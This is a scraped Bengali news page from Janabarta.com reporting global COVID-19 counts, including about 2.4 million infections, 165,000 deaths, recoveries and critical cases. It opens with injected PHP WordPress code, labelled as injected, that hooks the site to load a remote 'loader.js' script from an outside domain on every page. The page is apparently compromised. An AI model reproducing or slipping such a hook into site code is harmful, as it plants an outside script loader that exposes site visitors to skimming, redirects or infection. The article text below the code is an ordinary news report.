// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site সংক্রমণ ২৪ লাখ, মৃত্যু ১ লাখ ৬৫ হাজার - Janabarta.com

সংক্রমণ ২৪ লাখ, মৃত্যু ১ লাখ ৬৫ হাজার

আন্তর্জাতিক ডেস্কঃ মানুষের নানা পদক্ষেপ, চেষ্টা, গবেষণা, কৌশলকে তোয়াক্কা না করে অপ্রতিরোধ্য গতিতে এগিয়ে চলছে নভেল করোনাভাইরাস। এই মহামারিকে ঠেকাতে মানুষ যত নতুন নতুন পদ্ধতি অবলম্বন করছে, সে ততটাই ছড়িয়ে পড়ছে জনে জনে। এখন পর্যন্ত (বাংলাদেশ সময় সোমবার সকাল ৭টা) সারা বিশ্বে প্রাণঘাতী এই ভাইরাস সংক্রমিত হয়েছে ২৪ লাখ ৭ হাজার ৩৬ জনের শরীরে। প্রাণহানির ঘটনা ১ লাখ ৬৫ হাজার ২৫টি।

চলতি মাসের শুরুতে আক্রান্তের মোট সংখ্যা ছিল সাড়ে ৮ লাখের কিছু বেশি। অর্থাৎ গত ২০ দিনে নতুন সংক্রমণের সংখ্যা প্রায় ১৬ লাখ। প্রতিদিনই আক্রান্তের সংখ্যা লাখ ছুঁই ছুঁই থাকছে।

মৃতের সংখ্যা বেড়ে যাওয়ার গতি তুলনামূলক আরো বেশি। এপ্রিলের প্রথম দিন সংখ্যাটা ছিল ৫২ হাজার ৩২০। অর্থাৎ শেষ ২০ দিনে নতুন করে প্রাণ হারিয়েছেন প্রায় ১ লাখ ১২ হাজার ৭০৫ জন। গড়ে প্রতিদিন সাড়ে ৫ হাজারেরও বেশি মানুষকে কেড়ে নিচ্ছে করোনাভাইরাস।

সুস্থ হওয়ার গতিও কিছুটা বেড়েছে গত কয়েকদিনে। চলতি মাসের ১ তারিখে সুস্থ হয়ে ওঠা মানুষের সংখ্যা ছিল ১ লাখ ৭৮ হাজারেরও কিছু বেশি। এখন সেটা ৬ লাখ ২৫ হাজার। বর্তমানে আক্রান্ত আছেন ১৬ লাখ ১৭ হাজার ৩২৬ জন। গুরুতর অবস্থায় চিকিৎসাধীন ৫৪ হাজার ২২৬ জন। আক্রান্ত হলেও স্থিতিশীল আছেন ১৫ লাখ ৬৩ হাজার।